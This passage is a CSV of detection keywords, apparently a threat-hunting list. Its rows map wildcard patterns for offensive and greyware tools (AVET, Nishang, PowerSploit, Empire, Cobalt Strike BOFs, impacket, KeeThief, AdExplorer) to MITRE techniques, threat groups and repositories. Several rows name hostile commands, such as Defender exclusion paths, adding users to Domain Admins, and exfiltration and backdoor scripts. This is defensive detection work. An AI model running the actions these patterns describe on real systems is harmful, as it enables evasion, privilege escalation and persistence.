Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion hide_console*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion interaction_getchar*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion interaction_system_pause*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion is_debugger_present*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion sleep_by_ping *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*Add_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*addcomputer.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for 
working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Add-ConstrainedDelegationBackdoor*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Add-Exfiltration.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Add-KeePassConfigTrigger*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*AddKeePassTrigger.ps1*,offensive_tool_keyword,crackmapexec,Keepass exploitations from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*Add-MpPreference -ExclusionPath *,offensive_tool_keyword,powershell,Windows Defender evasion add an exclusion directory for your shady stuff,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*,greyware_tool_keyword,powershell,Exclude powershell from defender detections,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*,offensive_tool_keyword,powerview,modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. 
and modifying its permissions may lead to unintended security consequences.,T1222,TA0003,N/A,N/A,Persistence,https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1,1,0,N/A,N/A,1,15,2,2017-10-26T20:35:53Z,2017-07-07T13:34:07Z -*Add-Persistence *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Add-Persistence*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Add-Persistence.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*addpriv SeloadDrivePrivilege*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Add-PSFirewallRules*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*,greyware_tool_keyword,powershell,allows all users to access all computers with a specified configuration,T1053,TA0003,N/A,N/A,Persistence,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Add-RegBackdoor.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Add-RemoteRegBackdoor*,offensive_tool_keyword,AD exploitation cheat sheet,Using DAMP toolkit We add the backdoor using the 
Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Add-RemoteRegBackdoor*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*addresshunter.h*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Add-ServiceDacl *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Add-ServiceDacl*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*addspn.py -u * -p * -t * -s * --additional *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*addspn.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*AddUser-Bof.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUserImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*AddUserToDomainGroup *Domain Admins*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,0,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*AddUserToDomainGroup.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*AddUserToDomainGroup.cna*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*adexplorer.exe*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adexplorer.go*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*adexplorer.zip*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adexplorer64.exe*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adexplorer64a.exe*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. 
